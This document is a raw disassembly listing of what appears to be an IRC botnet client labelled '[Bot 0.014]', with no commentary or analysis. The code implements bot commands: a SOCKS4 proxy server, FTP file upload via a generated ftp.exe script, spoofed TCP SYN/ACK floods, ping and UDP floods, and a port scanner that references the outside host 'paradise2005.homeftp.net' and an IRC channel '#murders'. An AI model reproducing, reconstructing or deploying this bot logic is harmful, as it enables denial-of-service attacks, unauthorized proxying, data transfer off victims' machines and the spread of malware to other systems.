loc_40D6FE: ; CODE XREF: sub_4089DC+4D07�j
mov eax, [ebp+var_4]
push [ebp+var_A0]
mov esi, [ebp+arg_4]
mov [ebp+var_300], eax
mov eax, [ebp+var_C]
mov [ebp+var_2FC], eax
lea eax, [ebp+var_39C]
push 80h
push eax
mov [ebp+var_3A0], esi
call sub_41466D
add esp, 0Ch
push [ebp+var_30C]
push esi
call sub_407D15
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_414415
push edi
lea eax, [ebp+var_2F0]
push 12h
push eax
call sub_41229A
add esp, 1Ch
mov [ebp+var_308], eax
lea eax, [ebp+var_1C]
push eax
push edi
lea eax, [ebp+var_3A0]
push eax
push offset sub_410FF6
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, edi
mov dword_4366B4[ecx], eax
jnz short loc_40D7B2
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aSocks4FailedTo ; "[SOCKS4]: Failed to start server thread"...
jmp loc_40E667
; ---------------------------------------------------------------------------
loc_40D7AA: ; CODE XREF: sub_4089DC+4DDC�j
push 32h
call ds:dword_420000 ; Sleep
loc_40D7B2: ; CODE XREF: sub_4089DC+4DBB�j
cmp [ebp+var_2F8], edi
jz short loc_40D7AA
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_40D7BF: ; CODE XREF: sub_4089DC+DAC�j
; sub_4089DC+DC0�j ...
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_40D7E7
mov edi, eax
push 4
mov esi, offset aSec ; "sec"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40D7E7
and [ebp+var_3CC], eax
jmp short loc_40D7F1
; ---------------------------------------------------------------------------
loc_40D7E7: ; CODE XREF: sub_4089DC+4DF1�j
; sub_4089DC+4E01�j
mov [ebp+var_3CC], 1
loc_40D7F1: ; CODE XREF: sub_4089DC+4E09�j
push [ebp+var_A0]
lea eax, [ebp+var_450]
push 80h
push eax
call sub_41466D
mov eax, [ebp+arg_4]
mov [ebp+var_454], eax
mov eax, [ebp+var_4]
mov [ebp+var_3C8], eax
mov eax, [ebp+var_C]
xor esi, esi
add esp, 0Ch
cmp [ebp+var_3CC], esi
mov [ebp+var_3C4], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_40D83A
mov eax, offset aUnsecuring ; "Unsecuring"
loc_40D83A: ; CODE XREF: sub_4089DC+4E57�j
push eax
push offset aSecureSSystem_ ; "[SECURE]: %s system."
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41466D
push esi
lea eax, [ebp+var_2F0]
push 1Ah
push eax
call sub_41229A
add esp, 1Ch
mov [ebp+var_3D0], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_454]
push eax
push offset sub_4104EF
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_3D0]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40D8B1
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
jmp loc_40B88E
; ---------------------------------------------------------------------------
loc_40D8A9: ; CODE XREF: sub_4089DC+4EDB�j
push 32h
call ds:dword_420000 ; Sleep
loc_40D8B1: ; CODE XREF: sub_4089DC+4EBA�j
cmp [ebp+var_3C0], esi
jz short loc_40D8A9
jmp loc_40D9C2
; ---------------------------------------------------------------------------
loc_40D8BE: ; CODE XREF: sub_4089DC+D84�j
; sub_4089DC+D98�j
push offset aBot0_014 ; "[Bot 0.014]"
lea eax, [ebp+var_2F0]
push offset aMainS ; "[MAIN]: %s"
push eax
call sub_414415
loc_40D8D4: ; CODE XREF: sub_4089DC+45E6�j
add esp, 0Ch
jmp loc_40C323
; ---------------------------------------------------------------------------
loc_40D8DC: ; CODE XREF: sub_4089DC+D5C�j
; sub_4089DC+D70�j
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
jz short loc_40D934
push ebx
call sub_4147A2
test eax, eax
pop ecx
jl short loc_40D92C
cmp eax, 2
jge short loc_40D92C
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
lea esi, [ecx+edx]
cmp byte ptr [esi], 0
jz short loc_40D924
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2F0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_414415
add esp, 0Ch
and byte ptr [esi], 0
jmp short loc_40D99F
; ---------------------------------------------------------------------------
loc_40D924: ; CODE XREF: sub_4089DC+4F29�j
push eax
push offset aMainNoUserLogg ; "[MAIN]: No user logged in at slot: %d."
jmp short loc_40D990
; ---------------------------------------------------------------------------
loc_40D92C: ; CODE XREF: sub_4089DC+4F14�j
; sub_4089DC+4F19�j
push eax
push offset aMainInvalidLog ; "[MAIN]: Invalid login slot number: %d."
jmp short loc_40D990
; ---------------------------------------------------------------------------
loc_40D934: ; CODE XREF: sub_4089DC+4F09�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_40D939: ; CODE XREF: sub_4089DC+4F9A�j
mov esi, [ebp+var_A8]
mov eax, edx
loc_40D941: ; CODE XREF: sub_4089DC+4F81�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40D963
test cl, cl
jz short loc_40D95F
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40D963
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40D941
loc_40D95F: ; CODE XREF: sub_4089DC+4F6F�j
xor eax, eax
jmp short loc_40D968
; ---------------------------------------------------------------------------
loc_40D963: ; CODE XREF: sub_4089DC+4F6B�j
; sub_4089DC+4F79�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40D968: ; CODE XREF: sub_4089DC+4F85�j
test eax, eax
jz short loc_40D97A
inc edi
add edx, 80h
cmp edi, 2
jl short loc_40D939
jmp short loc_40D99F
; ---------------------------------------------------------------------------
loc_40D97A: ; CODE XREF: sub_4089DC+4F8E�j
mov eax, [ebp+arg_18]
shl edi, 7
and byte ptr [edi+eax], 0
lea eax, [ebp+var_F0]
push eax
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
loc_40D990: ; CODE XREF: sub_4089DC+3B17�j
; sub_4089DC+4F4E�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_414415
add esp, 0Ch
loc_40D99F: ; CODE XREF: sub_4089DC+2DA2�j
; sub_4089DC+2DC6�j ...
cmp [ebp+var_C], 0
jnz short loc_40D9C2
push 0
loc_40D9A7: ; CODE XREF: sub_4089DC+53C5�j
; sub_4089DC+57CA�j
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
loc_40D9BA: ; CODE XREF: sub_4089DC+292C�j
; sub_4089DC+2B3C�j ...
call sub_4056BF
add esp, 14h
loc_40D9C2: ; CODE XREF: sub_4089DC+11D3�j
; sub_4089DC+2916�j ...
xor esi, esi
inc esi
jmp loc_40A0E7
; ---------------------------------------------------------------------------
loc_40D9CA: ; CODE XREF: sub_4089DC+D34�j
; sub_4089DC+D48�j
mov edi, [ebp+var_A4]
push 4
mov esi, offset dword_427938
pop ecx
xor edx, edx
repe cmpsb
jz loc_409E4B
call sub_41240B
loc_40D9E7: ; CODE XREF: sub_4089DC+48D0�j
push 0
call ds:dword_420034 ; ExitProcess
loc_40D9EF: ; CODE XREF: sub_4089DC+1557�j
push 8
mov edi, eax
mov esi, offset aHttpcon ; "httpcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DBA6
push 5
mov edi, eax
mov esi, offset aHcon ; "hcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DBA6
cmp [ebp+ebx+var_94], edx
jz loc_408C5A
mov edi, eax
push 7
mov esi, offset aUpload ; "upload"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40E4AE
mov edi, [ebp+ebx+var_94]
push 4
push edi
call sub_402AE7
test eax, eax
pop ecx
pop ecx
jnz short loc_40DA67
push edi
push offset aFtpFileNotFoun ; "[FTP]: File not found: %s."
loc_40DA53: ; CODE XREF: sub_4089DC+3C3B�j
lea eax, [ebp+var_2F0]
push eax
call sub_414415
add esp, 0Ch
jmp loc_40C040
; ---------------------------------------------------------------------------
loc_40DA67: ; CODE XREF: sub_4089DC+506F�j
call ds:dword_420004 ; GetTickCount
push eax
call sub_4145C4
pop ecx
call sub_4145D1
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_4145D1
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_4145D1
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_1C70]
push edx
push eax
lea eax, [ebp+var_16C4]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_414415
lea eax, [ebp+var_16C4]
push offset aAb ; "ab"
push eax
call sub_414BF3
add esp, 20h
test eax, eax
mov [ebp+var_18], eax
jz loc_408C5A
mov esi, [ebp+ebx+var_A4]
push edi
push [ebp+arg_0]
push [ebp+ebx+var_9C]
push [ebp+ebx+var_A0]
push esi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_415ADF
push [ebp+var_18]
call sub_4147F3
lea eax, [ebp+var_16C4]
push eax
lea eax, [ebp+var_8CC]
push offset aSS_4 ; "-s:%s"
push eax
call sub_414415
add esp, 2Ch
xor eax, eax
push eax
push eax
lea ecx, [ebp+var_8CC]
push ecx
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push eax
call dword_435910
test eax, eax
push esi
push edi
jz short loc_40DB42
push offset aFtpUploadingFi ; "[FTP]: Uploading file: %s to: %s"
jmp short loc_40DB47
; ---------------------------------------------------------------------------
loc_40DB42: ; CODE XREF: sub_4089DC+515D�j
push offset aFtpUploading_0 ; "[FTP]: Uploading file: %s to: %s failed"...
loc_40DB47: ; CODE XREF: sub_4089DC+5164�j
call sub_414415
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40DB72
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 14h
loc_40DB72: ; CODE XREF: sub_4089DC+5177�j
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
jmp short loc_40DB8C
; ---------------------------------------------------------------------------
loc_40DB80: ; CODE XREF: sub_4089DC+51C3�j
lea eax, [ebp+var_16C4]
push eax
call sub_415AB5
loc_40DB8C: ; CODE XREF: sub_4089DC+51A2�j
lea eax, [ebp+var_16C4]
push 4
push eax
call sub_402AE7
add esp, 0Ch
test eax, eax
jnz short loc_40DB80
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_40DBA6: ; CODE XREF: sub_4089DC+5021�j
; sub_4089DC+5035�j
push [ebp+ebx+var_94]
push [ebp+arg_0]
push [ebp+ebx+var_9C]
push [ebp+ebx+var_A0]
call sub_4147A2
pop ecx
push eax
push [ebp+ebx+var_A4]
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_404999
jmp loc_40E4AB
; ---------------------------------------------------------------------------
loc_40DBE5: ; CODE XREF: sub_4089DC+152F�j
; sub_4089DC+1543�j
push [ebp+ebx+var_A4]
lea eax, [ebp+var_1134]
push 80h
push eax
call sub_41466D
add esp, 0Ch
push 4
lea edi, [ebp+var_1134]
mov esi, offset aSyn ; "syn"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40DC46
push 4
lea edi, [ebp+var_1134]
mov esi, offset aAck ; "ack"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40DC46
push 7
lea edi, [ebp+var_1134]
mov esi, offset aRandom_0 ; "random"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40DC46
push offset aTcpInvalidFloo ; "[TCP]: Invalid flood type specified."
jmp loc_40DD87
; ---------------------------------------------------------------------------
loc_40DC46: ; CODE XREF: sub_4089DC+5236�j
; sub_4089DC+524A�j ...
push [ebp+arg_0]
call sub_4147A2
test eax, eax
pop ecx
mov [ebp+var_102C], eax
jle loc_40DD82
mov eax, [ebp+ebx+var_A4]
push eax
mov [ebp+var_8], eax
mov esi, 80h
lea eax, [ebp+var_1134]
push esi
push eax
call sub_41466D
mov edi, [ebp+ebx+var_A0]
push edi
lea eax, [ebp+var_11B4]
push esi
push eax
call sub_41466D
mov ebx, [ebp+ebx+var_9C]
push ebx
call sub_4147A2
push [ebp+var_A0]
mov [ebp+var_1030], eax
xor eax, eax
cmp [ebp+var_44A], al
push esi
setnz al
mov [ebp+var_1028], eax
mov eax, [ebp+arg_4]
mov [ebp+var_11B8], eax
lea eax, [ebp+var_10B4]
push eax
call sub_41466D
mov eax, [ebp+var_4]
mov [ebp+var_1024], eax
mov eax, [ebp+var_C]
add esp, 28h
cmp [ebp+var_1028], 0
mov [ebp+var_1020], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_40DCF7
mov eax, offset aNormal ; "Normal"
loc_40DCF7: ; CODE XREF: sub_4089DC+5314�j
push [ebp+arg_0]
push ebx
push edi
push [ebp+var_8]
push eax
push offset aTcpSSFloodingS ; "[TCP]: %s %s flooding: (%s:%s) for %s s"...
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41466D
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Dh
push eax
call sub_41229A
add esp, 2Ch
mov [ebp+var_1034], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_11B8]
push eax
push offset sub_4119EF
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_1034]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40DD78
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aTcpFailedToSta ; "[TCP]: Failed to start flood thread, er"...
jmp loc_40E438
; ---------------------------------------------------------------------------
loc_40DD70: ; CODE XREF: sub_4089DC+53A2�j
push 32h
call ds:dword_420000 ; Sleep
loc_40DD78: ; CODE XREF: sub_4089DC+5381�j
cmp [ebp+var_101C], esi
jz short loc_40DD70
jmp short loc_40DD97
; ---------------------------------------------------------------------------
loc_40DD82: ; CODE XREF: sub_4089DC+527B�j
push offset aTcpInvalidFl_0 ; "[TCP]: Invalid flood time must be great"...
loc_40DD87: ; CODE XREF: sub_4089DC+5265�j
lea eax, [ebp+var_2F0]
push eax
call sub_414415
pop ecx
pop ecx
loc_40DD95: ; CODE XREF: sub_4089DC+54FF�j
xor esi, esi
loc_40DD97: ; CODE XREF: sub_4089DC+409F�j
; sub_4089DC+53A4�j ...
cmp [ebp+var_C], esi
jnz loc_40D9C2
push esi
jmp loc_40D9A7
; ---------------------------------------------------------------------------
loc_40DDA6: ; CODE XREF: sub_4089DC+14F3�j
; sub_4089DC+1507�j ...
cmp dword_435988, 0
jnz loc_40DEC2
mov eax, [ebp+var_C]
mov [ebp+var_694], eax
mov eax, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A4]
mov [ebp+var_698], eax
lea eax, [ebp+var_72C]
push eax
call sub_4144A0
push [ebp+ebx+var_A0]
call sub_4147A2
push [ebp+ebx+var_9C]
mov [ebp+var_6AC], eax
call sub_4147A2
push [ebp+arg_0]
mov [ebp+var_6A8], eax
call sub_4147A2
push 7Fh
push [ebp+var_A0]
mov [ebp+var_6A4], eax
lea eax, [ebp+var_7AC]
push eax
call sub_4144A0
push [ebp+var_6A4]
mov eax, [ebp+arg_4]
push [ebp+var_6A8]
mov [ebp+var_7B0], eax
lea eax, [ebp+var_72C]
push eax
push [ebp+var_6AC]
lea eax, [ebp+var_2F0]
push offset aPingSendingDPi ; "[PING]: Sending %d pings to %s. packet "...
push eax
call sub_414415
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Fh
push eax
call sub_41229A
add esp, 48h
mov [ebp+var_69C], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_7B0]
push eax
push offset sub_407DBB
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_69C]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40DEB5
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aPingFailedToSt ; "[PING]: Failed to start flood thread, e"...
jmp loc_40E438
; ---------------------------------------------------------------------------
loc_40DEAD: ; CODE XREF: sub_4089DC+54DF�j
push 32h
call ds:dword_420000 ; Sleep
loc_40DEB5: ; CODE XREF: sub_4089DC+54BE�j
cmp [ebp+var_690], esi
jz short loc_40DEAD
jmp loc_40DD97
; ---------------------------------------------------------------------------
loc_40DEC2: ; CODE XREF: sub_4089DC+53D1�j
push 1FFh
lea eax, [ebp+var_2F0]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_4144A0
add esp, 0Ch
jmp loc_40DD95
; ---------------------------------------------------------------------------
loc_40DEE0: ; CODE XREF: sub_4089DC+14B7�j
; sub_4089DC+14CB�j ...
mov eax, [ebp+var_C]
mov edi, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A4]
mov [ebp+var_694], eax
lea eax, [ebp+var_72C]
push eax
mov [ebp+var_698], edi
call sub_4144A0
push [ebp+ebx+var_A0]
call sub_4147A2
push [ebp+ebx+var_9C]
mov [ebp+var_6AC], eax
call sub_4147A2
push [ebp+arg_0]
mov [ebp+var_6A8], eax
call sub_4147A2
mov ebx, [ebp+ebx+var_94]
xor esi, esi
add esp, 18h
cmp ebx, esi
mov [ebp+var_6A4], eax
jz short loc_40DF58
push ebx
call sub_4147A2
pop ecx
mov [ebp+var_6A0], eax
jmp short loc_40DF5E
; ---------------------------------------------------------------------------
loc_40DF58: ; CODE XREF: sub_4089DC+556B�j
mov [ebp+var_6A0], esi
loc_40DF5E: ; CODE XREF: sub_4089DC+557A�j
push 7Fh
push [ebp+var_A0]
lea eax, [ebp+var_7AC]
push eax
call sub_4144A0
push [ebp+var_6A4]
mov ebx, [ebp+arg_4]
push [ebp+var_6A8]
lea eax, [ebp+var_72C]
push eax
push [ebp+var_6AC]
lea eax, [ebp+var_2F0]
push offset aUdpSendingDPac ; "[UDP]: Sending %d packets to: %s. Packe"...
push eax
mov [ebp+var_7B0], ebx
call sub_414415
push esi
lea eax, [ebp+var_2F0]
push 10h
push eax
call sub_41229A
add esp, 30h
mov [ebp+var_69C], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_7B0]
push eax
push offset sub_407F44
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_69C]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40E01F
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aUdpFailedToSta ; "[UDP]: Failed to start flood thread, er"...
push eax
call sub_414415
add esp, 0Ch
loc_40E007: ; CODE XREF: sub_4089DC+564B�j
cmp [ebp+var_C], esi
jnz loc_40D9C2
push esi
push edi
jmp loc_40B73C
; ---------------------------------------------------------------------------
loc_40E017: ; CODE XREF: sub_4089DC+5649�j
push 32h
call ds:dword_420000 ; Sleep
loc_40E01F: ; CODE XREF: sub_4089DC+560E�j
cmp [ebp+var_690], esi
jz short loc_40E017
jmp short loc_40E007
; ---------------------------------------------------------------------------
loc_40E029: ; CODE XREF: sub_4089DC+148F�j
; sub_4089DC+14A3�j
push 9
call sub_41248A
mov esi, [ebp+ebx+var_A0]
push esi
mov edi, eax
call sub_4147A2
add eax, edi
cmp eax, 258h
pop ecx
pop ecx
jle short loc_40E07B
push edi
lea eax, [ebp+var_2F0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_414415
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
jmp loc_40BFF9
; ---------------------------------------------------------------------------
loc_40E07B: ; CODE XREF: sub_4089DC+566C�j
push [ebp+ebx+var_A4]
call sub_4147A2
push esi
mov [ebp+var_4F4], eax
call sub_4147A2
push [ebp+ebx+var_9C]
mov [ebp+var_4DC], eax
call sub_4147A2
add esp, 0Ch
cmp eax, 5
mov [ebp+var_4F0], eax
jnb short loc_40E0BC
push 5
pop eax
mov [ebp+var_4F0], eax
loc_40E0BC: ; CODE XREF: sub_4089DC+56D5�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_40E0C9
mov [ebp+var_4F0], ecx
loc_40E0C9: ; CODE XREF: sub_4089DC+56E5�j
push [ebp+arg_0]
call sub_4147A2
mov [ebp+var_4EC], eax
mov eax, 320h
cmp [ebp+var_4EC], eax
pop ecx
jbe short loc_40E0EB
mov [ebp+var_4EC], eax
loc_40E0EB: ; CODE XREF: sub_4089DC+5707�j
push [ebp+arg_4]
or [ebp+var_4D8], 0FFFFFFFFh
call sub_407D15
pop ecx
lea edx, [ebp+var_67C]
loc_40E101: ; CODE XREF: sub_4089DC+572D�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E101
xor edi, edi
cmp dword_42B068, edi
mov [ebp+var_5FC], edi
mov [ebp+var_10], edi
jz short loc_40E181
mov ecx, offset dword_42B068
loc_40E123: ; CODE XREF: sub_4089DC+5785�j
mov edi, [ebp+ebx+var_A4]
lea esi, [ecx-28h]
loc_40E12D: ; CODE XREF: sub_4089DC+576D�j
mov dl, [esi]
mov al, dl
cmp dl, [edi]
jnz short loc_40E14F
test al, al
jz short loc_40E14B
mov dl, [esi+1]
mov al, dl
cmp dl, [edi+1]
jnz short loc_40E14F
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40E12D
loc_40E14B: ; CODE XREF: sub_4089DC+575B�j
xor eax, eax
jmp short loc_40E154
; ---------------------------------------------------------------------------
loc_40E14F: ; CODE XREF: sub_4089DC+5757�j
; sub_4089DC+5765�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40E154: ; CODE XREF: sub_4089DC+5771�j
test eax, eax
jz short loc_40E165
inc [ebp+var_10]
add ecx, 3Ch
cmp dword ptr [ecx], 0
jnz short loc_40E123
jmp short loc_40E17F
; ---------------------------------------------------------------------------
loc_40E165: ; CODE XREF: sub_4089DC+577A�j
mov eax, [ebp+var_10]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42B068[ecx]
mov [ebp+var_4F4], ecx
mov [ebp+var_4D8], eax
loc_40E17F: ; CODE XREF: sub_4089DC+5787�j
xor edi, edi
loc_40E181: ; CODE XREF: sub_4089DC+5740�j
cmp [ebp+var_4F4], edi
jnz short loc_40E1AB
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
loc_40E18E: ; CODE XREF: sub_4089DC+5883�j
lea eax, [ebp+var_2F0]
push eax
call sub_414415
loc_40E19A: ; CODE XREF: sub_4089DC+416B�j
pop ecx
pop ecx
loc_40E19C: ; CODE XREF: sub_4089DC+4289�j
; sub_4089DC+429E�j
cmp [ebp+var_C], edi
jnz loc_40D9C2
push edi
jmp loc_40D9A7
; ---------------------------------------------------------------------------
loc_40E1AB: ; CODE XREF: sub_4089DC+57AB�j
mov esi, [ebp+ebx+var_94]
cmp esi, edi
mov [ebp+var_18], esi
jz short loc_40E1E9
cmp byte ptr [esi], 23h
jz short loc_40E1E9
push esi
lea eax, [ebp+var_68C]
push 10h
push eax
call sub_41466D
push 78h
push esi
call sub_4158C0
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4C8], eax
jmp loc_40E319
; ---------------------------------------------------------------------------
loc_40E1E9: ; CODE XREF: sub_4089DC+57DB�j
; sub_4089DC+57E0�j
cmp [ebp+var_442], 0
jz short loc_40E213
push 7Fh
lea eax, [ebp+var_67C]
push offset aParadise2005_h ; "paradise2005.homeftp.net"
push eax
call sub_4144A0
mov eax, dword_42BFDC
add esp, 0Ch
mov [ebp+var_5FC], eax
loc_40E213: ; CODE XREF: sub_4089DC+5814�j
cmp [ebp+var_44B], 0
jz short loc_40E23F
push edi
push 9
push offset aStoppingPrevio ; "Stopping previous scans"
push offset aScan_0 ; "[SCAN]"
push 1
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4124D0
add esp, 20h
loc_40E23F: ; CODE XREF: sub_4089DC+583E�j
cmp [ebp+var_45B], 0
jnz short loc_40E264
cmp [ebp+var_45A], 0
jnz short loc_40E264
cmp [ebp+var_44A], 0
jnz short loc_40E264
push offset aScanFailedTo_2 ; "[SCAN]: Failed to start scan, no IP spe"...
jmp loc_40E18E
; ---------------------------------------------------------------------------
loc_40E264: ; CODE XREF: sub_4089DC+586A�j
; sub_4089DC+5873�j ...
push 10h
pop esi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_D8]
push eax
push [ebp+arg_4]
mov [ebp+var_28], esi
call dword_435780 ; getsockname
mov al, [ebp+var_45B]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_D4], eax
push [ebp+var_D4]
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+var_68C]
push eax
call sub_4144A0
add esp, 0Ch
cmp [ebp+var_44A], 0
jz short loc_40E313
xor eax, eax
cmp [ebp+var_45B], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_68C]
push eax
call sub_414470
and byte ptr [ebp+arg_0+3], 0
cmp esi, edi
pop ecx
pop ecx
jle short loc_40E307
loc_40E2E5: ; CODE XREF: sub_4089DC+5929�j
cmp eax, edi
jz short loc_40E307
mov byte ptr [eax], 78h
lea eax, [ebp+var_68C]
push 30h
push eax
call sub_414470
inc byte ptr [ebp+arg_0+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_0+3]
cmp ecx, esi
jl short loc_40E2E5
loc_40E307: ; CODE XREF: sub_4089DC+5907�j
; sub_4089DC+590B�j
mov [ebp+var_4C8], 1
jmp short loc_40E319
; ---------------------------------------------------------------------------
loc_40E313: ; CODE XREF: sub_4089DC+58E0�j
mov [ebp+var_4C8], edi
loc_40E319: ; CODE XREF: sub_4089DC+5808�j
; sub_4089DC+5935�j
mov eax, [ebp+arg_4]
push [ebp+var_A0]
mov [ebp+var_4F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4D0], eax
mov eax, [ebp+var_C]
mov [ebp+var_4CC], eax
mov esi, 80h
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_41466D
mov ebx, [ebp+ebx+var_90]
add esp, 0Ch
cmp ebx, edi
jz short loc_40E36D
push ebx
loc_40E35B: ; CODE XREF: sub_4089DC+599E�j
push esi
loc_40E35C: ; CODE XREF: sub_4089DC+59BB�j
lea eax, [ebp+var_578]
push eax
call sub_41466D
add esp, 0Ch
jmp short loc_40E3A0
; ---------------------------------------------------------------------------
loc_40E36D: ; CODE XREF: sub_4089DC+597C�j
mov eax, [ebp+var_18]
cmp eax, edi
jz short loc_40E37C
cmp byte ptr [eax], 23h
jnz short loc_40E37C
push eax
jmp short loc_40E35B
; ---------------------------------------------------------------------------
loc_40E37C: ; CODE XREF: sub_4089DC+5996�j
; sub_4089DC+599B�j
xor ecx, ecx
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 420AEAh
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40E399
push eax
push 80h
jmp short loc_40E35C
; ---------------------------------------------------------------------------
loc_40E399: ; CODE XREF: sub_4089DC+59B3�j
and [ebp+var_578], 0
loc_40E3A0: ; CODE XREF: sub_4089DC+598F�j
xor esi, esi
cmp [ebp+var_4C8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40E3B4
mov eax, offset aSequential ; "Sequential"
loc_40E3B4: ; CODE XREF: sub_4089DC+59D1�j
push [ebp+var_4DC]
lea ecx, [ebp+var_68C]
push [ebp+var_4EC]
push [ebp+var_4F0]
push [ebp+var_4F4]
push ecx
push eax
lea eax, [ebp+var_2F0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_414415
push esi
lea eax, [ebp+var_2F0]
push 9
push eax
call sub_41229A
add esp, 2Ch
mov [ebp+var_4E8], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_68C]
push eax
push offset sub_401B9D
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_4E8]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40E454
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
loc_40E438: ; CODE XREF: sub_4089DC+538F�j
; sub_4089DC+54CC�j
lea eax, [ebp+var_2F0]
push eax
call sub_414415
add esp, 0Ch
jmp loc_40DD97
; ---------------------------------------------------------------------------
loc_40E44C: ; CODE XREF: sub_4089DC+5A7E�j
push 32h
call ds:dword_420000 ; Sleep
loc_40E454: ; CODE XREF: sub_4089DC+5A4E�j
cmp [ebp+var_4C4], esi
jz short loc_40E44C
jmp loc_40DD97
; ---------------------------------------------------------------------------
loc_40E461: ; CODE XREF: sub_4089DC+D0C�j
; sub_4089DC+D20�j
push [ebp+ebx+var_A4]
xor eax, eax
cmp [ebp+var_44C], al
setnz al
push eax
push dword_42BED8
lea eax, [ebp+var_3BC]
push eax
call sub_40FC7C
lea eax, [ebp+var_3BC]
push eax
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_405674
lea eax, [ebp+var_3BC]
push eax
push offset aMainRandomNick ; "[MAIN]: Random nick change: %s"
